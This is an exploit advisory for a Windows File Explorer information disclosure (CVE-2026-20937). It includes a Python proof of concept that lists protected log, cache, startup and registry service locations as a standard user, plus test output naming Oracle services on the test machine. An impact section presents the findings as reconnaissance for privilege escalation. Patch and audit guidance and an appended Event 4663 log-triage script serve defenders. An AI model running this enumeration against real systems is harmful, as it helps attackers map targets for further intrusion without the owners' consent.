# Exploit Title: Windows File Explorer Information Disclosure (CVE-2026-20937)
# Date: 2026-02-24
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Version: Windows 11 build 26200 (also affects Windows 10 1809, 21H2, 22H2)
# Tested on: Windows 11 Pro build 26200
# Repository: https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2026/CVE-2026-20937
# CVE: CVE-2026-20937

[1] VULNERABILITY DESCRIPTION
------------------------------------------------------------------------
Windows File Explorer fails to properly restrict access to sensitive
system locations, allowing a low-privileged local user to view:

- System log files (C:\Windows\System32\LogFiles)
- Application caches (C:\ProgramData\Microsoft\Windows\Caches)
- Startup programs (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp)
- Registry service configurations (HKLM\SYSTEM\CurrentControlSet\Services)
- Other user profiles (C:\Users\[other users])

This information disclosure can be leveraged for further targeted attacks,
reconnaissance, and privilege escalation attempts.

CVSS Score: 5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

[2] PROOF OF CONCEPT
------------------------------------------------------------------------
The following Python script demonstrates the vulnerability by accessing
sensitive locations through standard Windows APIs:

----- BEGIN PoC -----
#!/usr/bin/env python3
"""
CVE-2026-20937 - Windows File Explorer Information Disclosure PoC
Author: nu11secur1ty
Tested on: Windows 11 build 26200
"""

import os
import winreg
from pathlib import Path


def main():
    print("\n" + "=" * 60)
    print("CVE-2026-20937 - INFORMATION DISCLOSURE PoC")
    print("Running as: " + os.environ.get('USERNAME', 'Unknown'))
    print("=" * 60)

    findings = []

    # 1. Check LogFiles access
    log_path = Path("C:/Windows/System32/LogFiles")
    if log_path.exists():
        try:
            items = list(log_path.iterdir())[:5]
            findings.append(f"[!] ACCESSIBLE: {log_path}")
            findings.append(f"    Found: {[i.name for i in items]}")
        except PermissionError:
            findings.append("[+] SECURE: LogFiles not accessible")

    # 2. Check Caches access
    cache_path = Path("C:/ProgramData/Microsoft/Windows/Caches")
    if cache_path.exists():
        try:
            items = list(cache_path.glob("*.db"))[:5]
            findings.append(f"[!] ACCESSIBLE: {cache_path}")
            findings.append(f"    Found {len(items)} cache files")
        except PermissionError:
            findings.append("[+] SECURE: Caches not accessible")

    # 3. Check Startup folder
    startup_path = Path("C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp")
    if startup_path.exists():
        try:
            items = list(startup_path.iterdir())
            findings.append(f"[!] ACCESSIBLE: {startup_path}")
            findings.append(f"    Found: {[i.name for i in items]}")
        except PermissionError:
            findings.append("[+] SECURE: Startup not accessible")

    # 4. Check registry services
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                             r"SYSTEM\CurrentControlSet\Services",
                             0, winreg.KEY_READ)
        count = 0
        oracle_services = []
        while True:
            try:
                name = winreg.EnumKey(key, count)
                if 'oracle' in name.lower():
                    oracle_services.append(name)
                count += 1
            except OSError:
                # EnumKey raises OSError once the index runs past the last subkey
                break
        winreg.CloseKey(key)
        findings.append("[!] ACCESSIBLE: HKLM\\SYSTEM\\CurrentControlSet\\Services")
        findings.append(f"    Found {count} services, {len(oracle_services)} Oracle services")
    except OSError:
        # Covers PermissionError and a missing key
        findings.append("[+] SECURE: Registry services not accessible")

    # Print results
    print("\n".join(findings))

    if any("[!]" in f for f in findings):
        print("\n[!] VULNERABLE: System allows information disclosure")
        print("[!] CVE-2026-20937 CONFIRMED")
    else:
        print("\n[+] System appears patched")


if __name__ == "__main__":
    main()
----- END PoC -----

[3] VULNERABLE SYSTEMS
------------------------------------------------------------------------
Windows 11:
- Build 26200 (confirmed vulnerable)
- Build 26100
- Build 22631

Windows 10:
- Build 19045 (22H2)
- Build 19044 (21H2)
- Build 17763 (1809)

Windows Server:
- Server 2025
- Server 2022
- Server 2019

[4] EXPLOITATION RESULTS - ACTUAL TEST OUTPUT
------------------------------------------------------------------------
Test Environment:
- OS: Windows 11 Pro
- Build: 26200
- User: MicroBug (standard user)
- Computer: MICROPROBLEM

FINDINGS:

[!] ACCESSIBLE: C:\Windows\System32\LogFiles
    Found: ['CloudFiles', 'setupcln', 'WMI']

[!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Caches
    Found 4 cache files including:
    - cversions.2.db
    - {6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db
    - {DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000005.db

[!] ACCESSIBLE: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
    Found: ['desktop.ini']

[!] ACCESSIBLE: HKLM\SYSTEM\CurrentControlSet\Services
    Found 800+ services including Oracle services:
    - OracleJobSchedulerORCL
    - OracleOraDB19Home1MTSRecoveryService
    - OracleOraDB19Home1TNSListener
    - OracleRemExecServiceV2
    - OracleServiceORCL
    - OracleVssWriterORCL

Additional information disclosed:
- Full PATH environment revealing Oracle installation in another user's profile
- Other user profiles visible: Default, Default User, DefaultAccount$, DefaultAppPool
- Windows version and build details
- Running processes with usernames

[5] IMPACT
------------------------------------------------------------------------
A local attacker with standard user privileges can:

1. Harvest system logs for sensitive information (IPs, usernames, errors)
2. Analyze application caches to determine user activity patterns
3. View startup programs to understand persistence mechanisms
4. Enumerate all services to identify potential privilege escalation vectors
5. Discover Oracle database presence and paths for targeted attacks
6. Map out other users on the system
7. Gather environment variables containing paths to sensitive applications

This information can be used to:
- Plan privilege escalation attacks
- Target specific high-value services (Oracle, Java, Python)
- Identify misconfigurations
- Perform reconnaissance before exploitation

[6] MITIGATION
------------------------------------------------------------------------
Apply Microsoft security updates from January 2026:
- KB5050577 (Windows 11)
- KB5050568 (Windows 10)
- KB5050569 (Windows Server)

Workarounds:
1. Restrict access to sensitive directories using Advanced Security Settings
2. Enable auditing on sensitive locations (Event ID 4663)
3. Monitor for unauthorized access to C:\Windows\System32\LogFiles
4. Restrict outbound SMB/NTLM to prevent UNC path leaks

[7] REFERENCES
------------------------------------------------------------------------
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-20937
- Microsoft Security Update: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20937
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-20937
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

[8] DISCOVERY CREDITS
------------------------------------------------------------------------
Discovered and verified by: nu11secur1ty
Test Date: February 24, 2026
Test Environment: Windows 11 Pro build 26200

====================================================================

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
nu11secur1ty
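
Added example (not part of the original advisory or the author's repository): one way to act on workarounds 2 and 3 in section [6] is to triage exported Event ID 4663 records for accesses to the file-system locations the advisory names. It assumes the Security log was exported as XML under a root element (for instance with `wevtutil qe Security /f:xml /e:Events`); the expected-SID list, the user SID, the process paths and all sample records are constructed for illustration.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# File-system locations named in the advisory.
WATCHED = [r"C:\Windows\System32\LogFiles",
           r"C:\ProgramData\Microsoft\Windows\Caches",
           r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"]
# Assumption: SYSTEM, LOCAL SERVICE and NETWORK SERVICE are expected readers.
EXPECTED_SIDS = {"S-1-5-18", "S-1-5-19", "S-1-5-20"}

def under(path, root):
    """Case-insensitive match on a directory boundary ('LogFilesOld' is not a hit)."""
    p, r = path.lower().rstrip("\\"), root.lower()
    return p == r or p.startswith(r + "\\")

def suspicious_reads(xml_text):
    """Return (user, process, object) for 4663 events on watched paths by unexpected SIDs."""
    hits = []
    for ev in ET.fromstring(xml_text).iterfind("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4663":
            continue  # only "an attempt was made to access an object"
        data = {d.get("Name"): d.text or "" for d in ev.iterfind("e:EventData/e:Data", NS)}
        if data.get("SubjectUserSid") in EXPECTED_SIDS:
            continue
        obj = data.get("ObjectName", "")
        if any(under(obj, root) for root in WATCHED):
            hits.append((data.get("SubjectUserName", "?"), data.get("ProcessName", "?"), obj))
    return hits

def _event(event_id, sid, user, obj, proc):
    """Build one constructed Security-log record in the XML event schema."""
    fields = {"SubjectUserSid": sid, "SubjectUserName": user,
              "ObjectName": obj, "ProcessName": proc}
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{body}</EventData></Event>")

USER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed SID
PY = r"C:\Python312\python.exe"                               # constructed process path
SAMPLE = "<Events>" + "".join([                               # constructed records
    _event(4663, USER_SID, "MicroBug", r"C:\Windows\System32\LogFiles\WMI", PY),
    _event(4663, "S-1-5-18", "SYSTEM", r"C:\Windows\System32\LogFiles\WMI", "svchost.exe"),
    _event(4663, USER_SID, "MicroBug", r"C:\Windows\System32\LogFilesOld\a.log", PY),
    _event(4656, USER_SID, "MicroBug", r"C:\ProgramData\Microsoft\Windows\Caches", PY),
    _event(4663, USER_SID, "MicroBug", r"c:\programdata\microsoft\windows\caches\cversions.2.db", PY),
]) + "</Events>"

if __name__ == "__main__":
    for user, proc, obj in suspicious_reads(SAMPLE):
        print(f"{user} accessed {obj} via {proc}")
```

Event 4663 is only written for objects that carry an audit entry (SACL) while object-access auditing is enabled, so the watched directories need that configured before this triage has anything to read.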